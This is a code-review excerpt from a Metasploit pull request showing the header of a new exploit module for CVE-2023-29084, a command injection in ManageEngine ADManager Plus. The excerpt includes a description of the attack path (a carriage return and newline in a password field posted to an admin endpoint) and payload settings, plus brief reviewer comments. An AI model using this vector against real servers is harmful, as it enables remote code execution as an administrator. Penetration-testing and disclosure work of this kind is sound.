modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb

```diff
@@ -0,0 +1,221 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ManageEngine ADManager Plus ChangePasswordAction Authenticated Command Injection',
+        'Description' => %q{
+          ManageEngine ADManager Plus prior to build 7181 is vulnerable to an authenticated command injection due to insufficient
+          validation of user input when performing the ChangePasswordAction function before passing it into a string that is later
+          used as an OS command to execute.
+
+          By making a POST request to /api/json/admin/saveServerSettings with a params POST
+          parameter containing a JSON array object that has a USERNAME or PASSWORD element containing a
+          carriage return and newline, followed by the command the attacker wishes to execute, an attacker can gain RCE as the user
+          running ADManager Plus, which will typically be the local administrator.
+
+          Note that the attacker must be authenticated in order to send requests to /api/json/admin/saveServerSettings,
+          so this vulnerability does require authentication to exploit.
+        },
+        'Author' => [
+          'Simon Humbert', # Disclosure of bug via ZDI
+          'Dinh Hoang', # Aka hnd3884. Writeup and PoC
+          'Grant Willcox', # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-29084'],
+          ['URL', 'https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/'], # Writeup
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-438/'], # ZDI Advisory
+          ['URL', 'https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html'], # Advisory
+          ['URL', 'https://www.manageengine.com/products/ad-manager/release-notes.html'] # Release Notes and Reporter Acknowledgement
+        ],
+        'DisclosureDate' => '2023-04-12',
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
+        'Privileged' => true,
+        'Payload' => {
+          'BadChars' => "\x22\x0A\x0B\x0C\x0D\x00[{}]:,", # Avoid double quotes, aka 0x22, and new line and line return characters
+          'Size' => 1600
```

Comment:
I don't think there's a size restriction from what I was testing while working through the payload issue.

Reply:
Yep agreed, left over from testing.

Reply:
Removed size restriction in https://github.com/rapid7/metasploit-framework/pull/18018/commits/ac99cb32711377646d30ce9bee39d1a0dcc6a2f4